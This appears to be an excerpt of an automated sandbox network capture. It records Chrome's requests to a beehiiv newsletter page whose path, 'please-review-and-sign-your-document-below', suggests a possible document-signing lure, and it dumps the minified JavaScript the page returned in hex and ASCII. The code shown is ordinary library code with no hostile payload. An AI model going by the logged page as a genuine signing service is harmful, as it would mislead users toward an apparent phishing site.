                                                                                                                                            2025-01-15 18:14:34 UTC472INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 62 34 34 36 32 37 31 62 2d 65 61 32 34 2d 35 30 64 63 2d 61 30 35 32 2d 32 36 66 63 37 34 38 36 30 30 32 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="b446271b-ea24-50dc-a052-26fc7486002e")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 74 73 5b 6e 5d 3b 74 79 70 65 6f 66 20 65 5b 30 5d 3d 3d 22 73 74 72 69 6e 67 22 26 26 28 65 5b 30 5d 3d 60 72 65 61 63 74 2d 69 31 38 6e 65 78 74 3a 3a 20 24 7b 65 5b 30 5d 7d 60 29 2c 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 2e 2e 2e 65 29 7d 7d 63 6f 6e 73 74 20 54 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 65 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 65 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 74 79 70 65 6f 66 20 65 5b 30 5d 3d 3d 22 73 74 72 69 6e 67 22 26 26 54 5b 65 5b 30 5d 5d 7c 7c 28 74 79 70 65 6f 66 20 65 5b 30 5d 3d 3d 22 73 74 72 69 6e 67 22 26 26 28 54 5b 65 5b 30 5d 5d 3d 6e 65 77 20 44 61 74 65 29 2c 4d 28
                                                                                                                                            Data Ascii: ts[n];typeof e[0]=="string"&&(e[0]=`react-i18next:: ${e[0]}`),console.warn(...e)}}const T={};function C(){for(var t=arguments.length,e=new Array(t),n=0;n<t;n++)e[n]=arguments[n];typeof e[0]=="string"&&T[e[0]]||(typeof e[0]=="string"&&(T[e[0]]=new Date),M(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 2e 6f 70 74 69 6f 6e 73 2e 69 67 6e 6f 72 65 4a 53 4f 4e 53 74 72 75 63 74 75 72 65 21 3d 3d 76 6f 69 64 20 30 3f 65 2e 68 61 73 4c 6f 61 64 65 64 4e 61 6d 65 73 70 61 63 65 28 74 2c 7b 6c 6e 67 3a 6e 2e 6c 6e 67 2c 70 72 65 63 68 65 63 6b 3a 28 69 2c 6f 29 3d 3e 7b 69 66 28 6e 2e 62 69 6e 64 49 31 38 6e 26 26 6e 2e 62 69 6e 64 49 31 38 6e 2e 69 6e 64 65 78 4f 66 28 22 6c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 22 29 3e 2d 31 26 26 69 2e 73 65 72 76 69 63 65 73 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 2e 62 61 63 6b 65 6e 64 26 26 69 2e 69 73 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 54 6f 26 26 21 6f 28 69 2e 69 73 4c 61 6e 67 75 61 67 65 43 68 61 6e 67 69 6e 67 54 6f 2c 74 29 29 72 65 74 75 72 6e 21 31 7d 7d 29 3a 50 28 74 2c 65 2c
                                                                                                                                            Data Ascii: .options.ignoreJSONStructure!==void 0?e.hasLoadedNamespace(t,{lng:n.lng,precheck:(i,o)=>{if(n.bindI18n&&n.bindI18n.indexOf("languageChanging")>-1&&i.services.backendConnector.backend&&i.isLanguageChangingTo&&!o(i.isLanguageChangingTo,t))return!1}}):P(t,e,
                                                                                                                                            2025-01-15 18:14:34 UTC877INData Raw: 65 72 79 28 72 3d 3e 6a 28 72 2c 6f 2c 63 29 29 2c 45 3d 4a 28 6f 2c 65 2e 6c 6e 67 7c 7c 6e 75 6c 6c 2c 63 2e 6e 73 4d 6f 64 65 3d 3d 3d 22 66 61 6c 6c 62 61 63 6b 22 3f 73 3a 73 5b 30 5d 2c 6d 29 2c 78 3d 28 29 3d 3e 45 2c 79 3d 28 29 3d 3e 7a 28 6f 2c 65 2e 6c 6e 67 7c 7c 6e 75 6c 6c 2c 63 2e 6e 73 4d 6f 64 65 3d 3d 3d 22 66 61 6c 6c 62 61 63 6b 22 3f 73 3a 73 5b 30 5d 2c 6d 29 2c 5b 49 2c 68 5d 3d 64 2e 75 73 65 53 74 61 74 65 28 78 29 3b 6c 65 74 20 4e 3d 73 2e 6a 6f 69 6e 28 29 3b 65 2e 6c 6e 67 26 26 28 4e 3d 60 24 7b 65 2e 6c 6e 67 7d 24 7b 4e 7d 60 29 3b 63 6f 6e 73 74 20 4c 3d 42 28 4e 29 2c 70 3d 64 2e 75 73 65 52 65 66 28 21 30 29 3b 64 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 63 6f 6e 73 74 7b 62 69 6e 64 49 31 38 6e 3a 72 2c 62 69 6e
                                                                                                                                            Data Ascii: ery(r=>j(r,o,c)),E=J(o,e.lng||null,c.nsMode==="fallback"?s:s[0],m),x=()=>E,y=()=>z(o,e.lng||null,c.nsMode==="fallback"?s:s[0],m),[I,h]=d.useState(x);let N=s.join();e.lng&&(N=`${e.lng}${N}`);const L=B(N),p=d.useRef(!0);d.useEffect(()=>{const{bindI18n:r,bin


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            44192.168.2.1649762104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC841OUTGET /assets/hidden-KuoXmiN5.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 933
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"3a5-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4161
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a2eba441e0-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 37 65 32 62 34 37 34 63 2d 36 62 62 30 2d 35 30 34 37 2d 39 63 37 37 2d 66 36 65 66 62 37 35 38 39 32 63 31 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="7e2b474c-6bb0-5047-9c77-f6efb75892c1")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC475INData Raw: 2e 2e 2e 72 7d 3d 65 2c 74 3d 7b 72 65 66 3a 6f 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 28 69 26 32 29 3d 3d 3d 32 3f 21 30 3a 28 64 3d 72 5b 22 61 72 69 61 2d 68 69 64 64 65 6e 22 5d 29 21 3d 6e 75 6c 6c 3f 64 3a 76 6f 69 64 20 30 2c 73 74 79 6c 65 3a 7b 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 74 6f 70 3a 31 2c 6c 65 66 74 3a 31 2c 77 69 64 74 68 3a 31 2c 68 65 69 67 68 74 3a 30 2c 70 61 64 64 69 6e 67 3a 30 2c 6d 61 72 67 69 6e 3a 2d 31 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 63 6c 69 70 3a 22 72 65 63 74 28 30 2c 20 30 2c 20 30 2c 20 30 29 22 2c 77 68 69 74 65 53 70 61 63 65 3a 22 6e 6f 77 72 61 70 22 2c 62 6f 72 64 65 72 57 69 64 74 68 3a 22 30 22 2c 2e 2e 2e 28 69 26 34 29 3d 3d 3d 34 26 26 28 69 26 32 29 21 3d 3d 32
                                                                                                                                            Data Ascii: ...r}=e,t={ref:o,"aria-hidden":(i&2)===2?!0:(d=r["aria-hidden"])!=null?d:void 0,style:{position:"fixed",top:1,left:1,width:1,height:0,padding:0,margin:-1,overflow:"hidden",clip:"rect(0, 0, 0, 0)",whiteSpace:"nowrap",borderWidth:"0",...(i&4)===4&&(i&2)!==2


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            45192.168.2.1649763104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC557OUTGET /assets/StatusInputs-JkVhk_jg.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC896INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 654
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"28e-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a3298d41d3-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC473INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 34 33 61 34 63 39 34 37 2d 65 37 36 36 2d 35 62 61 31 2d 39 31 39 34 2d 37 30 32 34 37 64 31 32 32 61 35 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="43a4c947-e766-5ba1-9194-70247d122a50")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC181INData Raw: 6e 70 75 74 22 2c 7b 68 69 64 64 65 6e 3a 21 30 2c 6e 61 6d 65 3a 60 24 7b 73 7d 5f 73 75 63 63 65 73 73 5f 6d 65 73 73 61 67 65 60 2c 64 65 66 61 75 6c 74 56 61 6c 75 65 3a 72 7d 29 5d 7d 29 3b 65 78 70 6f 72 74 7b 61 20 61 73 20 53 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 53 74 61 74 75 73 49 6e 70 75 74 73 2d 4a 6b 56 68 6b 5f 6a 67 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 34 33 61 34 63 39 34 37 2d 65 37 36 36 2d 35 62 61 31 2d 39 31 39 34 2d 37 30 32 34 37 64 31 32 32 61 35 30 0a
                                                                                                                                            Data Ascii: nput",{hidden:!0,name:`${s}_success_message`,defaultValue:r})]});export{a as S};//# sourceMappingURL=StatusInputs-JkVhk_jg.js.map//# debugId=43a4c947-e766-5ba1-9194-70247d122a50


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            46192.168.2.1649765104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:34 UTC550OUTGET /assets/index-CqJN8iQq.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:34 UTC899INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:34 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 11350
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960859&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=Gdulw2GN2jMrsMu7f5DCs9PfaRHOo6uA4nm0vspAeHE%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2c56-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8a32b827d11-EWR
                                                                                                                                            2025-01-15 18:14:34 UTC470INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 31 61 62 35 62 61 66 30 2d 30 36 64 31 2d 35 31 36 63 2d 62 31 33 62 2d 37 31 38 65 35 30 30 31 39 39 65 30 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1ab5baf0-06d1-516c-b13b-718e500199e0")}catch(
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 6c 65 22 29 29 2c 7b 69 6e 6e 65 72 48 54 4d 4c 3a 22 20 22 2c 69 64 3a 22 5f 67 6f 6f 62 65 72 22 7d 29 29 2e 66 69 72 73 74 43 68 69 6c 64 3a 74 7c 7c 53 2c 48 3d 2f 28 3f 3a 28 5b 5c 75 30 30 38 30 2d 5c 75 46 46 46 46 5c 77 2d 25 40 5d 2b 29 20 2a 3a 3f 20 2a 28 5b 5e 7b 3b 5d 2b 3f 29 3b 7c 28 5b 5e 3b 7d 7b 5d 2a 3f 29 20 2a 7b 29 7c 28 7d 5c 73 2a 29 2f 67 2c 4c 3d 2f 5c 2f 5c 2a 5b 5e 5d 2a 3f 5c 2a 5c 2f 7c 20 20 2b 2f 67 2c 44 3d 2f 5c 6e 2b 2f 67 2c 62 3d 28 74 2c 65 29 3d 3e 7b 6c 65 74 20 61 3d 22 22 2c 73 3d 22 22 2c 6f 3d 22 22 3b 66 6f 72 28 6c 65 74 20 72 20 69 6e 20 74 29 7b 6c 65 74 20 6e 3d 74 5b 72 5d 3b 72 5b 30 5d 3d 3d 22 40 22 3f 72 5b 31 5d 3d 3d 22 69 22 3f 61 3d 72 2b 22 20 22 2b 6e 2b 22 3b 22 3a 73 2b 3d 72 5b 31 5d 3d 3d 22
                                                                                                                                            Data Ascii: le")),{innerHTML:" ",id:"_goober"})).firstChild:t||S,H=/(?:([\u0080-\uFFFF\w-%@]+) *:? *([^{;]+?);|([^;}{]*?) *{)|(}\s*)/g,L=/\/\*[^]*?\*\/| +/g,D=/\n+/g,b=(t,e)=>{let a="",s="",o="";for(let r in t){let n=t[r];r[0]=="@"?r[1]=="i"?a=r+" "+n+";":s+=r[1]=="
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 73 2b 6f 2b 28 6e 3f 3f 22 22 29 7d 2c 22 22 29 3b 66 75 6e 63 74 69 6f 6e 20 41 28 74 29 7b 6c 65 74 20 65 3d 74 68 69 73 7c 7c 7b 7d 2c 61 3d 74 2e 63 61 6c 6c 3f 74 28 65 2e 70 29 3a 74 3b 72 65 74 75 72 6e 20 55 28 61 2e 75 6e 73 68 69 66 74 3f 61 2e 72 61 77 3f 52 28 61 2c 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 65 2e 70 29 3a 61 2e 72 65 64 75 63 65 28 28 73 2c 6f 29 3d 3e 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 73 2c 6f 26 26 6f 2e 63 61 6c 6c 3f 6f 28 65 2e 70 29 3a 6f 29 2c 7b 7d 29 3a 61 2c 5f 28 65 2e 74 61 72 67 65 74 29 2c 65 2e 67 2c 65 2e 6f 2c 65 2e 6b 29 7d 6c 65 74 20 4d 2c 49 2c 4e 3b 41 2e 62 69 6e 64 28 7b 67 3a 31 7d 29 3b 6c 65 74 20 68 3d 41 2e 62 69 6e 64 28 7b 6b 3a 31 7d 29 3b 66 75 6e
                                                                                                                                            Data Ascii: s+o+(n??"")},"");function A(t){let e=this||{},a=t.call?t(e.p):t;return U(a.unshift?a.raw?R(a,[].slice.call(arguments,1),e.p):a.reduce((s,o)=>Object.assign(s,o&&o.call?o(e.p):o),{}):a,_(e.target),e.g,e.o,e.k)}let M,I,N;A.bind({g:1});let h=A.bind({k:1});fun
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 61 73 74 73 3a 74 2e 74 6f 61 73 74 73 2e 6d 61 70 28 72 3d 3e 72 2e 69 64 3d 3d 3d 73 7c 7c 73 3d 3d 3d 76 6f 69 64 20 30 3f 7b 2e 2e 2e 72 2c 76 69 73 69 62 6c 65 3a 21 31 7d 3a 72 29 7d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 65 2e 74 6f 61 73 74 49 64 3d 3d 3d 76 6f 69 64 20 30 3f 7b 2e 2e 2e 74 2c 74 6f 61 73 74 73 3a 5b 5d 7d 3a 7b 2e 2e 2e 74 2c 74 6f 61 73 74 73 3a 74 2e 74 6f 61 73 74 73 2e 66 69 6c 74 65 72 28 72 3d 3e 72 2e 69 64 21 3d 3d 65 2e 74 6f 61 73 74 49 64 29 7d 3b 63 61 73 65 20 35 3a 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 70 61 75 73 65 64 41 74 3a 65 2e 74 69 6d 65 7d 3b 63 61 73 65 20 36 3a 6c 65 74 20 6f 3d 65 2e 74 69 6d 65 2d 28 74 2e 70 61 75 73 65 64 41 74 7c 7c 30 29 3b 72 65 74 75 72 6e 7b 2e 2e 2e 74 2c 70 61 75 73 65 64
                                                                                                                                            Data Ascii: asts:t.toasts.map(r=>r.id===s||s===void 0?{...r,visible:!1}:r)};case 4:return e.toastId===void 0?{...t,toasts:[]}:{...t,toasts:t.toasts.filter(r=>r.id!==e.toastId)};case 5:return{...t,pausedAt:e.time};case 6:let o=e.time-(t.pausedAt||0);return{...t,paused
                                                                                                                                            2025-01-15 18:14:34 UTC1369INData Raw: 72 6f 72 28 6a 28 65 2e 65 72 72 6f 72 2c 6f 29 2c 7b 69 64 3a 73 2c 2e 2e 2e 61 2c 2e 2e 2e 61 3f 2e 65 72 72 6f 72 7d 29 7d 29 2c 74 7d 3b 76 61 72 20 58 3d 28 74 2c 65 29 3d 3e 7b 78 28 7b 74 79 70 65 3a 31 2c 74 6f 61 73 74 3a 7b 69 64 3a 74 2c 68 65 69 67 68 74 3a 65 7d 7d 29 7d 2c 4b 3d 28 29 3d 3e 7b 78 28 7b 74 79 70 65 3a 35 2c 74 69 6d 65 3a 44 61 74 65 2e 6e 6f 77 28 29 7d 29 7d 2c 74 74 3d 74 3d 3e 7b 6c 65 74 7b 74 6f 61 73 74 73 3a 65 2c 70 61 75 73 65 64 41 74 3a 61 7d 3d 56 28 74 29 3b 63 2e 75 73 65 45 66 66 65 63 74 28 28 29 3d 3e 7b 69 66 28 61 29 72 65 74 75 72 6e 3b 6c 65 74 20 72 3d 44 61 74 65 2e 6e 6f 77 28 29 2c 6e 3d 65 2e 6d 61 70 28 69 3d 3e 7b 69 66 28 69 2e 64 75 72 61 74 69 6f 6e 3d 3d 3d 31 2f 30 29 72 65 74 75 72 6e 3b 6c
                                                                                                                                            Data Ascii: ror(j(e.error,o),{id:s,...a,...a?.error})}),t};var X=(t,e)=>{x({type:1,toast:{id:t,height:e}})},K=()=>{x({type:5,time:Date.now()})},tt=t=>{let{toasts:e,pausedAt:a}=V(t);c.useEffect(()=>{if(a)return;let r=Date.now(),n=e.map(i=>{if(i.duration===1/0)return;l
